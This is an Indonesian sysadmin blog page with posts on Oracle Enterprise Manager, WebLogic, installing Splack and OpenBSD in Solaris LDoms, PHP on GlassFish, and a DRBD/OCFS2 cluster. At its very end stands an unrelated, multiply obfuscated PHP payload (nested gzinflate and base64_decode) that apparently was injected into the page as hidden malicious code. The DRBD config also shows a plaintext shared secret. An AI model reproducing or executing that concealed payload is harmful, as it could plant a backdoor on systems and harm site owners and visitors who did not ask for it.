Oracle Enterprise Cloud Infrastucture

  ozzie / 23/04/2013

Exploring & Build Cloud & Solaris Virtualization (LDOMs & Zone).



just review: Oracle Enterprise Manager Ops Center. semua fitur; monitoring, provisioning, managing, maintaining.. hingga developing pun sudah include development plan… Migrate zone & vm.. server & storage pool..


Enterprise Manager Ops Center 12c & Enterprise Manager Cloud Control 12c



Oracle WebLogic

  ozzie / 21/04/2013

*Just Reminder
kadang install liwat GUI configure domain via quickstart.sh #:-s

kalo mesin-mesin SOLARIS non GUI:

# {WLS_HOME}/common/bin/config.sh -mode=console

oiyah #-o..
untuk solaris 11 harus install jdk, (default nya gak ada javac)

#  pkg  install --accept pkg:/developer/java/jdk@1.7.0.7-0.175.1.0.0.24.0


splack [slackware @ SPARC]

  ozzie / 10/04/2013

install splack @ SPARC Architecture:

berhubung running di LDoms nya solaris. tinggal alokasi resource seperlunya :D

[    0.000000] PROMLIB: Sun IEEE Boot Prom 'OBP 4.33.6.b 2012/12/11 20:50'
[    0.000000] PROMLIB: Root node compatible: sun4v
[    0.000000] Linux version 2.6.23.17-gl64090105 (root@toad) (gcc version 4.2.3) #2 SMP Tue Jan 6 04:22:34 Local time zone must be set--see zic m
[    0.000000] ARCH: SUN4V
[    0.000000] Ethernet address: 00:14:4f:fb:fa:64
[    0.000000] OF stdout device is: /virtual-devices@100/console@1
[    0.000000] PROM: Built device tree with 35549 bytes of memory.
[    0.000000] MDESC: Size is 19680 bytes.
[    0.000000] PLATFORM: banner-name [SPARC Enterprise T5220]
[    0.000000] PLATFORM: name [SUNW,SPARC-Enterprise-T5220]
[    0.000000] PLATFORM: hostid [84fbfa64]
[    0.000000] PLATFORM: serial# [00ab4130]
[    0.000000] PLATFORM: stick-frequency [5458c3a0]
[    0.000000] PLATFORM: mac-address [144ffbfa64]
[    0.000000] PLATFORM: watchdog-resolution [1000 ms]
[    0.000000] PLATFORM: watchdog-max-timeout [31536000000 ms]
[    0.000000] PLATFORM: max-cpus [64]
[    0.000000] On node 0 totalpages: 1046987
[    0.000000]   Normal zone: 7278 pages used for memmap
[    0.000000]   Normal zone: 0 pages reserved
[    0.000000]   Normal zone: 1039709 pages, LIFO batch:15
[    0.000000]   Movable zone: 0 pages used for memmap
[    0.000000] Built 1 zonelists in Zone order.  Total pages: 1039709
...
...
...
 
 
Welcome to the Splack Linux installation disk! (version 12.1-pre1)
 
######  IMPORTANT!  READ THE INFORMATION BELOW CAREFULLY.  ######
 
- You will need one or more partitions of type 'Linux' prepared.  It is also
  recommended that you create a swap partition (type 'Linux swap') prior
  to installation.  For more information, run 'setup' and read the help file.
 
- If you're having problems that you think might be related to low memory (this
  is possible on machines with 64 or less megabytes of system memory), you can
  try activating a swap partition before you run setup.  After making a swap
  partition (type 82) with cfdisk or fdisk, activate it like this: 
    mkswap /dev/<partition> ; swapon /dev/<partition>
 
- Once you have prepared the disk partitions for Linux, type 'setup' to begin
  the installation process.  
 
- If you do not have a color monitor, type:  TERM=vt100
  before you start 'setup'.
 
You may now login as 'root'.
 
slackware login: 
 
Linux 2.6.23.17-gl64090105.
 
If you're upgrading an existing Slackware system, you might want to
remove old packages before you run 'setup' to install the new ones. If
you don't, your system will still work but there might be some old files
left laying around on your drive.
 
Just mount your Linux partitions under /mnt and type 'pkgtool'. If you
don't know how to mount your partitions, type 'pkgtool' and it will tell
you how it's done.
 
To partition your hard drive(s), use 'cfdisk' or 'fdisk'.
To activate PCMCIA/Cardbus devices needed for installation, type 'pcmcia'.
To start the main installation, type 'setup'.
 
root@slackware:/#


Beautiful Dangerous

  ozzie / 01/04/2013

Tanjung Lesung
Tanjung Lesung


Tanjung Lesung 29 – 31 Maret 2013





Install OpenBSD pada LDom SOLARIS di mesin SUN Enterprise T5220
create guest at Domain Controller: dengan 8 CPU, 4GB Ram & 2 network interface sajah :p

# ldm add-domain OpenBSD
# ldm add-vcpu 8 OpenBSD
# ldm add-memory 4G OpenBSD 
# ldm add-vnet vnet1 primary-vsw0 OpenBSD
# ldm add-vnet vnet2 primary-vsw1 OpenBSD

create ZFS pool – disk

# zfs create Ldom/OpenBSD
# zfs create -V 40gb Ldom/OpenBSD/disk0
# zfs create -V 80gb Ldom/OpenBSD/disk0


# ldm add-vdsdev /dev/zvol/rdsk/Ldom/OpenBSD/disk0  openbsd-disk0@primary-vds0
# ldm add-vdsdev /dev/zvol/rdsk/Ldom/OpenBSD/disk1  openbsd-disk1@primary-vds0
# ldm add-vdisk vdisk1 openbsd-disk0@primary-vds0 OpenBSD
# ldm add-vdisk vdisk1 openbsd-disk0@primary-vds0 OpenBSD
# ldm bind sst-ldom-dev1
# ldm set-var auto-boot\?=false OpenBSD

download iso OpenBSD untuk architecture Sparc64 & attach ke domain

# wget ftp://ftp.openbsd.org/pub/OpenBSD/5.2/sparc64/install52.iso
# ldm add-vdsdev /export/home/ozzie/install52.iso iso@primary-vds0
# ldm add-vdisk cdrom iso@primary-vds0 OpenBSD



sampai sini telah membuat virtual device (cdrom) installer OpenBSD.

aktifkan guest domain & install openBSD seperti biasa..

# ldm start-domain OpenBSD
# telnet localhost 50xx
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
 
Connecting to console "OpenBSD" in group "OpenBSD" ....
Press ~? for control options ..
 
{0} ok 
{0} ok 
{0} ok devalias
cdrom                    /virtual-devices@100/channel-devices@200/disk@1
vdisk1                   /virtual-devices@100/channel-devices@200/disk@0
...
...
...
 
Boot device: /virtual-devices@100/channel-devices@200/disk@1:f  File and args: 
OpenBSD IEEE 1275 Bootblock 1.3
..>> OpenBSD BOOT 1.4
Trying bsd...
Booting /virtual-devices@100/channel-devices@200/disk@0:a/bsd
6605424@0x1000000+5520@0x164ca70+173400@0x1800000+4020904@0x182a558 
symbols @ 0xfedd02c0 81+405456+255993 start=0x1000000
[ using 662248 bytes of bsd ELF symbol table ]
console is /virtual-devices@100/console@1
Copyright (c) 1982, 1986, 1989, 1991, 1993
	The Regents of the University of California.  All rights reserved.
Copyright (c) 1995-2012 OpenBSD. All rights reserved.  http://www.OpenBSD.org
 
OpenBSD 5.2 (GENERIC.MP) #236: Mon Jul 30 16:38:18 MDT 2012
    deraadt@sparc64.openbsd.org:/usr/src/sys/arch/sparc64/compile/GENERIC.MP
real mem = 4294967296 (4096MB)
avail mem = 4210024448 (4014MB)
mainbus0 at root: SPARC Enterprise T5220
cpu0 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu1 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu2 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu3 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu4 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu5 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu6 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu7 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
vbus0 at mainbus0
"flashprom" at vbus0 not configured
"n2cp" at vbus0 not configured
"ncp" at vbus0 not configured
vrng0 at vbus0
vcons0 at vbus0: ivec 0x111, console
cbus0 at vbus0
vnet0 at cbus0 chan 0x0: ivec 0x200, 0x201, address 00:14:4f:f8:45:94
vnet1 at cbus0 chan 0x3: ivec 0x206, 0x207, address 00:14:4f:fa:c4:73
vdsk0 at cbus0 chan 0x6: ivec 0x20c, 0x20d
scsibus0 at vdsk0: 2 targets
sd0 at scsibus0 targ 0 lun 0: <SUN, Virtual Disk, 1.0> SCSI3 0/direct fixed
sd0: 40960MB, 512 bytes/sector, 83886080 sectors
"virtual-domain-service" at cbus0 not configured
vrtc0 at vbus0
vscsi0 at root
..
..
..
..

install seperti biasa dan bersih-bersih setelah selesai

# ldm set-var auto-boot\?=true OpenBSD
# ldm stop OpenBSD
LDom OpenBSD stopped
# ldm remove-vdisk cdrom OpenBSD 
# ldm remove-vdsdev iso@primary-vds0

Semoga bermanfaat… :p



OutBound D2M Hasil Kebon 2013

  ozzie / 04/03/2013

Tanakita Campsite: 1-3 Maret 2013



PHP @ GlassFish

  ozzie / 26/02/2013

source: http://quercus.caucho.com/

running PHP script pada server ber-Oracle Glassfish

web.xml

<servlet>
   <servlet-name>Quercus</servlet-name>
   <servlet-class>com.caucho.quercus.servlet.QuercusServlet</servlet-class>
   <init-param>
      <param-name>ini-file</param-name>
      <param-value>WEB-INF/php.ini</param-value>
   </init-param>
</servlet>
 
<servlet-mapping>
   <servlet-name>Quercus</servlet-name>
       <url-pattern>*.php</url-pattern>
</servlet-mapping>


Cluster storage with DRBD & OCFS2

  ozzie / 17/02/2013

Clustering storage dengan DRBD & OCFS2.

/etc/drbd.conf

global { usage-count no; }
resource res0 {
  protocol C;
  startup { become-primary-on both;  wfc-timeout 10; degr-wfc-timeout     30; }
#  startup {  wfc-timeout 10; degr-wfc-timeout     30; }
  disk { on-io-error detach; 
#fencing resource-and-stonith;
} 
net {   
    after-sb-0pri discard-zero-changes;
    after-sb-1pri discard-secondary;
    after-sb-2pri disconnect;
    allow-two-primaries; 
    cram-hmac-alg "sha1"; 
    shared-secret "m0ny3t"; 
} 
syncer { rate 10M; }
on OL5-dev01 {
    device /dev/drbd0;
    disk /dev/xvdb;
    address 10.0.5.11:7788;
    meta-disk internal;
}
on OL5-dev02 {
    device /dev/drbd0;
    disk /dev/xvdb;
    address 10.0.5.12:7788;
    meta-disk internal;
}
# handlers { outdate-peer "/sbin/kill-peer.sh";  }
}

/etc/ocfs2/cluster.conf

cluster: 
        node_count = 2
        name = ocfs2
node: 
        ip_port = 7777 
        ip_address = 10.0.5.11
        number = 0 
        name = OL5-dev01
        cluster = ocfs2
node: 
        ip_port = 7777 
        ip_address = 10.0.5.12
        number = 1
        name = OL5-dev02
        cluster = ocfs2

# drbd-overview 
  1:res0  SyncSource Primary/Secondary UpToDate/Inconsistent C r---- 
        [=>..................] sync'ed: 14.3% (xxx/xxxxxxx)M
# drbd-overview 
  1:res0  Connected Primary/Secondary UpToDate/UpToDate C r----

pada node ke-2:

# drbdadm primary res0
# drbd-overview 
  1:res0  Connected Primary/Primary UpToDate/UpToDate C r----

Setelah proses Sync selesai, format dengan OCFS2 dengan tambah option: –fs-feature-level=max-compat

# mkfs -t ocfs2 -N 2 --fs-feature-level=max-compat -L ocfs2_drbd0 /dev/drbd0
mkfs.ocfs2 1.8.0
Cluster stack: classic o2cb
Overwriting existing ocfs2 partition.
Proceed (y/N): y
Label: ocfs2_drbd0
Features: backup-super strict-journal-super
Block size: 4096 (12 bits)
Cluster size: 4096 (12 bits)
Volume size: 10737053696 (2621351 clusters) (2621351 blocks)
Cluster groups: 82 (tail covers 8615 clusters, rest cover 32256 clusters)
Extent allocator size: 8388608 (2 groups)
Journal size: 67108864
Node slots: 2
Creating bitmaps: done
Initializing superblock: done
Writing system files: done
Writing superblock: done
Writing backup superblock: 2 block(s)
Formatting Journals: done
Growing extent allocator: done
Formatting slot map: done
Formatting quota files: done
Writing lost+found: done
mkfs.ocfs2 successful

 
  debugfs.ocfs2 -R stats /dev/drbd0
	Revision: 0.90
	Mount Count: 0   Max Mount Count: 20
	State: 0   Errors: 0
	Check Interval: 0   Last Check: Mon Feb 18 22:15:32 2013
	Creator OS: 0
	Feature Compat: 3 backup-super strict-journal-super
	Feature Incompat: 0 
	Tunefs Incomplete: 0 
	Feature RO compat: 0 
	Root Blknum: 5   System Dir Blknum: 6
	First Cluster Group Blknum: 3
	Block Size Bits: 12   Cluster Size Bits: 12
	Max Node Slots: 2
	Extended Attributes Inline Size: 0
	Label: ocfs2_drbd0
	UUID: 5D05B514F6CA481AA0B1FF35B6DFF943
	Hash: 0 (0x0)
	DX Seeds: 0 0 0 (0x00000000 0x00000000 0x00000000)
	Cluster stack: classic o2cb
	Cluster flags: 0 
	Inode: 2   Mode: 00   Generation: 4135372128 (0xf67cc560)
	FS Generation: 4135372128 (0xf67cc560)
	CRC32: 00000000   ECC: 0000
	Type: Unknown   Attr: 0x0   Flags: Valid System Superblock 
	Dynamic Features: (0x0) 
	User: 0 (root)   Group: 0 (root)   Size: 0
	Links: 0   Clusters: 2621351
	ctime: 0x51224594 0x0 -- Mon Feb 18 22:15:32.0 2013
	atime: 0x0 0x0 -- Thu Jan  1 07:00:00.0 1970
	mtime: 0x51224594 0x0 -- Mon Feb 18 22:15:32.0 2013
	dtime: 0x0 -- Thu Jan  1 07:00:00 1970
	Refcount Block: 0
	Last Extblk: 0   Orphan Slot: 0
	Sub Alloc Slot: Global   Sub Alloc Bit: 65535

untuk mounting OCFS2 dpt dengan:

# mount -o noatime,nodiratime /dev/drbd0 /data

sample Pada node-2:

# drbd-overview 
  0:res0/0  Connected Primary/Primary UpToDate/UpToDate C r----- /data ocfs2 10G 163M 9.9G 2%


".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>